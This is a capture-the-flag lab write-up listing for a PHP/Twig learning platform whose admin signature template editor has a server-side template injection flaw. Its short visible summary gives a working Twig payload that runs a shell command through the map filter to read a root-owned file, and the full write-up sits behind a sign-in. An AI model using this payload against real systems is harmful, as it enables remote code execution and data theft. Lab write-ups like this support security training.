webProeasy
Lab 130 — LearnPulse — SSTI in Signature Template Engine
hackadvisor
Task: PHP/Twig learning platform with admin Signature Template editor vulnerable to SSTI. Solution: Injected {{ [\"cat /root/flag.txt\"]|map(\"system\") }} via Twig map filter callback to achieve RCE as root.
$ ls tags/ techniques/
map_filter_callbackssti_twig_rcetwig_map_system_rcephp_array_map_callback
🔒
Permission denied (requires tier.pro)
Sign in to access full writeups
Sign in with GitHub to continue. No email required.
$sign in$ grep --similar
Similar writeups
- [web][Pro]MailPulse— hackadvisor
- [web][Pro]Lab 225 — MailPulse — SSTI in Campaign Template Preview— hackadvisor
- [web][Pro]Lab 225 — MailPulse — SSTI in Campaign Template Preview— hackadvisor
- [web][Pro]Lab 120 — InfraPulse— hackadvisor
- [web][Pro]Lab 133 — MailForge — SSTI via Handlebars Template Preview— hackadvisor